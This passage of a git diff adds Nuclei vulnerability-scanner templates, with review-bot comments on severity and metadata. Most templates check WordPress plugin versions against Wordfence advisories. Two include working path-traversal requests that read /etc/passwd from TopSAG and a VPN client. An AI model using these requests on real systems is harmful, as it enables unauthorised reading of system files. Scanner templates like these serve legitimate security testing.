+ fofa-query: "wp-content/plugins/revy/"
+ google-query: inurl:"/wp-content/plugins/revy/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,revy,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/revy/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "revy"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.18')
\ No newline at end of file
diff --git a/poc/other/rrdevs-for-elementor.yaml b/poc/other/rrdevs-for-elementor.yaml
new file mode 100644
index 0000000000..afa6887f94
--- /dev/null
+++ b/poc/other/rrdevs-for-elementor.yaml
@@ -0,0 +1,59 @@
+id: rrdevs-for-elementor-205fba8fcfa128a4dd45c5c816b0bc58
+
+info:
+ name: >
+ RRAddons for Elementor <= 1.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdeb9625-65fa-42bd-9708-7090691aae45?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/rrdevs-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/rrdevs-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,rrdevs-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/rrdevs-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "rrdevs-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.0')
\ No newline at end of file
diff --git a/poc/other/shortcode-elementor-31466df2cf677a943b18b87d140554bf.yaml b/poc/other/shortcode-elementor-31466df2cf677a943b18b87d140554bf.yaml
new file mode 100644
index 0000000000..351ef6b94b
--- /dev/null
+++ b/poc/other/shortcode-elementor-31466df2cf677a943b18b87d140554bf.yaml
@@ -0,0 +1,59 @@
+id: shortcode-elementor-31466df2cf677a943b18b87d140554bf
+
+info:
+ name: >
+ Shortcodes for Elementor <= 1.0.4 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5debe121-6373-4b56-8441-f0d4a5920089?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/shortcode-elementor/"
+ google-query: inurl:"/wp-content/plugins/shortcode-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,shortcode-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/shortcode-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "shortcode-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.4')
\ No newline at end of file
diff --git a/poc/other/simple-locator-64cca06d1166ced2ac235d17d2f88e70.yaml b/poc/other/simple-locator-64cca06d1166ced2ac235d17d2f88e70.yaml
new file mode 100644
index 0000000000..a08f3c5cfe
--- /dev/null
+++ b/poc/other/simple-locator-64cca06d1166ced2ac235d17d2f88e70.yaml
@@ -0,0 +1,59 @@
+id: simple-locator-64cca06d1166ced2ac235d17d2f88e70
+
+info:
+ name: >
+ Simple Locator <= 2.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/38cb5e43-56d0-40b6-936a-f10f15d2e72f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/simple-locator/"
+ google-query: inurl:"/wp-content/plugins/simple-locator/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,simple-locator,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-locator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-locator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.3')
\ No newline at end of file
diff --git a/poc/other/smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1.yaml b/poc/other/smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1.yaml
new file mode 100644
index 0000000000..fe4dca72d0
--- /dev/null
+++ b/poc/other/smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1.yaml
@@ -0,0 +1,59 @@
+id: smart-popup-blaster-38242ca08bf2b38877007cc96b7c92a1
+
+info:
+ name: >
+ Smart PopUp Blaster <= 1.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/afd7fe73-1f24-4e47-a0c4-5a08662c4dbe?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/smart-popup-blaster/"
+ google-query: inurl:"/wp-content/plugins/smart-popup-blaster/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,smart-popup-blaster,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smart-popup-blaster/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smart-popup-blaster"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.3')
\ No newline at end of file
diff --git a/poc/other/svg-shortcode.yaml b/poc/other/svg-shortcode.yaml
new file mode 100644
index 0000000000..3a78232b2d
--- /dev/null
+++ b/poc/other/svg-shortcode.yaml
@@ -0,0 +1,59 @@
+id: svg-shortcode-4fe77db4dce510d7ffe8afd6b30a1e49
+
+info:
+ name: >
+ SVG Shortcode <= 1.0.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG Upload
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b378256-2d9b-4aad-abfe-fecfc76f0bb4?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/svg-shortcode/"
+ google-query: inurl:"/wp-content/plugins/svg-shortcode/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,svg-shortcode,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/svg-shortcode/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "svg-shortcode"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/other/sweetdate.yaml b/poc/other/sweetdate.yaml
new file mode 100644
index 0000000000..a339705be7
--- /dev/null
+++ b/poc/other/sweetdate.yaml
@@ -0,0 +1,59 @@
+id: sweetdate-e5542b1b90e04f838a674478f1ae9a52
+
+info:
+ name: >
+ Sweet Date <= 3.7.3 - Unauthenticated Privilege Escalation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8dd34937-7641-4b9c-ba59-c4a1ec95f4cd?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/sweetdate/"
+ google-query: inurl:"/wp-content/themes/sweetdate/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,sweetdate,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/sweetdate/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sweetdate"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.7.3')
\ No newline at end of file
diff --git a/poc/other/tabs-maker-daf9e2cf38c5806dd492be7fef17b720.yaml b/poc/other/tabs-maker-daf9e2cf38c5806dd492be7fef17b720.yaml
new file mode 100644
index 0000000000..89cdddc976
--- /dev/null
+++ b/poc/other/tabs-maker-daf9e2cf38c5806dd492be7fef17b720.yaml
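Review bot: `severity: low` and the `low` tag do not fit a title of `Unauthenticated Privilege Escalation`; with `cvss-score` left empty this looks like a generator default rather than an assessed rating. Scans and dashboards that filter on severity would deprioritise or drop this finding, so the value should be taken from the referenced Wordfence advisory, or the template held back until it is known. The `Tickera – WordPress Event Ticketing <= 3.5.4.8 - Unauthenticated Customer Data Exposure` template later in this commit carries the same `low` rating and deserves the same check.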
@@ -0,0 +1,59 @@
+id: tabs-maker-daf9e2cf38c5806dd492be7fef17b720
+
+info:
+ name: >
+ Tabs Maker <= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/284c5646-7728-45bd-9479-483c806ca804?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/tabs-maker/"
+ google-query: inurl:"/wp-content/plugins/tabs-maker/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,tabs-maker,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tabs-maker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tabs-maker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0')
\ No newline at end of file
diff --git a/poc/other/tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4.yaml b/poc/other/tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4.yaml
new file mode 100644
index 0000000000..f6f7633de0
--- /dev/null
+++ b/poc/other/tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4.yaml
@@ -0,0 +1,59 @@
+id: tcbd-popover-cde275ba1470f5ed86bd89d6dd9707b4
+
+info:
+ name: >
+ TCBD Popover <= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b08f533-9c74-4be3-99ff-70a3d9b90358?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/tcbd-popover/"
+ google-query: inurl:"/wp-content/plugins/tcbd-popover/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,tcbd-popover,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tcbd-popover/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tcbd-popover"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2')
\ No newline at end of file
diff --git a/poc/other/the-permalinker-89aed934f46868a1f2162bc8d7aacc36.yaml b/poc/other/the-permalinker-89aed934f46868a1f2162bc8d7aacc36.yaml
new file mode 100644
index 0000000000..52909a2e30
--- /dev/null
+++ b/poc/other/the-permalinker-89aed934f46868a1f2162bc8d7aacc36.yaml
@@ -0,0 +1,59 @@
+id: the-permalinker-89aed934f46868a1f2162bc8d7aacc36
+
+info:
+ name: >
+ The Permalinker <= 1.8.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d03dbe48-371f-4fb7-8902-a013338ac7d4?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/the-permalinker/"
+ google-query: inurl:"/wp-content/plugins/the-permalinker/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,the-permalinker,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/the-permalinker/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "the-permalinker"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.1')
\ No newline at end of file
diff --git a/poc/other/themify-store-locator.yaml b/poc/other/themify-store-locator.yaml
new file mode 100644
index 0000000000..8300dc1a0e
--- /dev/null
+++ b/poc/other/themify-store-locator.yaml
@@ -0,0 +1,59 @@ +id: themify-store-locator-e1393938516ee9ae32cd5a606ad5b4ae + +info: + name: > + Themify Store Locator <= 1.1.9 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/287abdef-24de-4e1b-a673-59cd37411bf6?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/themify-store-locator/" + google-query: inurl:"/wp-content/plugins/themify-store-locator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,themify-store-locator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/themify-store-locator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "themify-store-locator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.9') \ No newline at end of file diff --git a/poc/other/tianrongxin-TopSAG-download-download.yaml b/poc/other/tianrongxin-TopSAG-download-download.yaml new file mode 100644 index 0000000000..448ff5c3a5 --- /dev/null +++ b/poc/other/tianrongxin-TopSAG-download-download.yaml @@ -0,0 +1,23 @@ +id: tianrongxin-TopSAG-download-downloadfile + +info: + name: tianrongxin-TopSAG-download-downloadfile + author: PokerSec + severity: high + metadata: + fofasearch: header="iam" && server="Apache-Coyote/" + +requests: + - raw: + - |- + GET /iam/download;.login.jsp?filepath=/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 
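Review bot: In the tianrongxin-TopSAG hunk the `info:` block carries no `description`, `reference` or `tags`, so a finding cannot be traced to an advisory or a fixed version and cannot be selected or excluded by tag. The search hint is stored as `fofasearch`, while the other templates in this patch use `fofa-query`, and the request section uses `requests:` where the others use `http:`; pick one spelling of each across the repository. The `id` (`…-download-downloadfile`) also differs from the file name (`…-download-download.yaml`). The same gaps appear in the other PokerSec templates added here (wangyuxingyun, yongyou-BIP, yonyou-UFIDA-NC, D-Link, cyberpanel, hamlintek, kingdee, meite-crm, tianrongxin-yunweishenji).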
diff --git a/poc/other/tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml b/poc/other/tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml new file mode 100644 index 0000000000..28a2cc21b1 --- /dev/null +++ b/poc/other/tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750.yaml @@ -0,0 +1,59 @@ +id: tickera-event-ticketing-system-5a3ee1f11c4a6d8e9eba3cf37c043750 + +info: + name: > + Tickera – WordPress Event Ticketing <= 3.5.4.8 - Unauthenticated Customer Data Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2db29c12-bf8a-4d5a-b12a-6c74b816d5f0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/tickera-event-ticketing-system/" + google-query: inurl:"/wp-content/plugins/tickera-event-ticketing-system/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,tickera-event-ticketing-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tickera-event-ticketing-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tickera-event-ticketing-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.4.8') \ No newline at end of file diff --git a/poc/other/unlock-addons-for-elementor.yaml b/poc/other/unlock-addons-for-elementor.yaml new file mode 100644 index 0000000000..a260d767e5 --- /dev/null +++ b/poc/other/unlock-addons-for-elementor.yaml 
@@ -0,0 +1,59 @@ +id: unlock-addons-for-elementor-3a1552c6c63a6565750f219a6bc5b9e2 + +info: + name: > + Unlock Addons for Elementor <= 1.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/62f1635a-cb94-4c5e-a1f6-90a1eeb38968?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/unlock-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/unlock-addons-for-elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,unlock-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/unlock-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "unlock-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.0') \ No newline at end of file diff --git a/poc/other/visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d.yaml b/poc/other/visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d.yaml new file mode 100644 index 0000000000..8a1b7227d1 --- /dev/null +++ b/poc/other/visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d.yaml 
@@ -0,0 +1,59 @@ +id: visualmodo-elements-134a8cc9ff775949b36d0becbb4ef51d + +info: + name: > + Visualmodo Elements <= 1.0.2 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/49005688-fa40-458d-9c96-5ec2ca7adcd3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/visualmodo-elements/" + google-query: inurl:"/wp-content/plugins/visualmodo-elements/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,visualmodo-elements,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/visualmodo-elements/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visualmodo-elements" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/poc/other/wangyuxingyun_vpn_client_filedownload.yaml b/poc/other/wangyuxingyun_vpn_client_filedownload.yaml new file mode 100644 index 0000000000..ba2d43083d --- /dev/null +++ b/poc/other/wangyuxingyun_vpn_client_filedownload.yaml 
@@ -0,0 +1,30 @@
+id: wangyuxingyun_vpn_client_filedownload
+
+info:
+ name: wangyuxingyun_vpn_client_filedownload
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: body="easSessionId" || header="easportal"
+
+http:
+ - raw:
+ - |+
+ GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+ - type: word
+ part: header
+ words:
+ - "appframe"
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/other/woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml b/poc/other/woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml
new file mode 100644
index 0000000000..e2bec6a0c4
--- /dev/null
+++ b/poc/other/woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f.yaml
@@ -0,0 +1,59 @@ +id: woo-cart-count-shortcode-ba5e554357f7d9eec7e0e2ce4da9ba5f + +info: + name: > + WooCommerce Cart Count Shortcode <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8373938c-060a-4579-a133-d25b4d065d36?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-cart-count-shortcode/" + google-query: inurl:"/wp-content/plugins/woo-cart-count-shortcode/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-cart-count-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-cart-count-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-cart-count-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.4') \ No newline at end of file diff --git a/poc/other/woo-product-excel-importer.yaml b/poc/other/woo-product-excel-importer.yaml new file mode 100644 index 0000000000..f4a60a6c64 --- /dev/null +++ b/poc/other/woo-product-excel-importer.yaml 
@@ -0,0 +1,59 @@ +id: woo-product-excel-importer-ca4c619b208bcba2a3262a03cfacdba5 + +info: + name: > + PHPSpreadsheet Library < 2.3.0 - XXE Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38f950b7-e3a0-4e05-a8b0-9cc6b6c66b0c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/woo-product-excel-importer/" + google-query: inurl:"/wp-content/plugins/woo-product-excel-importer/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,woo-product-excel-importer,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-product-excel-importer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-product-excel-importer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.9') \ No newline at end of file diff --git a/poc/other/wot-elementor-widgets.yaml b/poc/other/wot-elementor-widgets.yaml new file mode 100644 index 0000000000..dbd5cc6672 --- /dev/null +++ b/poc/other/wot-elementor-widgets.yaml 
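Review bot: The `name` describes a library range (`PHPSpreadsheet Library < 2.3.0`) while the `dsl` matcher compares the plugin's own readme `Stable tag` against `<= 5.9`, so the title of a reported finding does not say which component or version was actually checked. I would name the plugin in `name:` and say in `description:` that the plugin version is used as a proxy for the bundled library. The webd-woocommerce-product-excel-importer-bulk-edit template later in this patch has the same name, the same Wordfence reference and the same id suffix with a different bound (`<= 4.6`), and needs the same change.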
@@ -0,0 +1,59 @@ +id: wot-elementor-widgets-674d9cfa695bad4d29fdb872785d2ffb + +info: + name: > + Wot Elementor Widgets <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1fdb1314-5979-42bb-96dd-cc1648283c4e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wot-elementor-widgets/" + google-query: inurl:"/wp-content/plugins/wot-elementor-widgets/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wot-elementor-widgets,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wot-elementor-widgets/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wot-elementor-widgets" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/other/yongyou-BIP-getolapconnectionlist-infoleak.yaml b/poc/other/yongyou-BIP-getolapconnectionlist-infoleak.yaml new file mode 100644 index 0000000000..d7ea888e1a --- /dev/null +++ b/poc/other/yongyou-BIP-getolapconnectionlist-infoleak.yaml 
@@ -0,0 +1,19 @@
+id: yongyou-BIP-getolapconnectionlist-infoleak
+
+info:
+ name: yongyou-BIP-getolapconnectionlist-infoleak
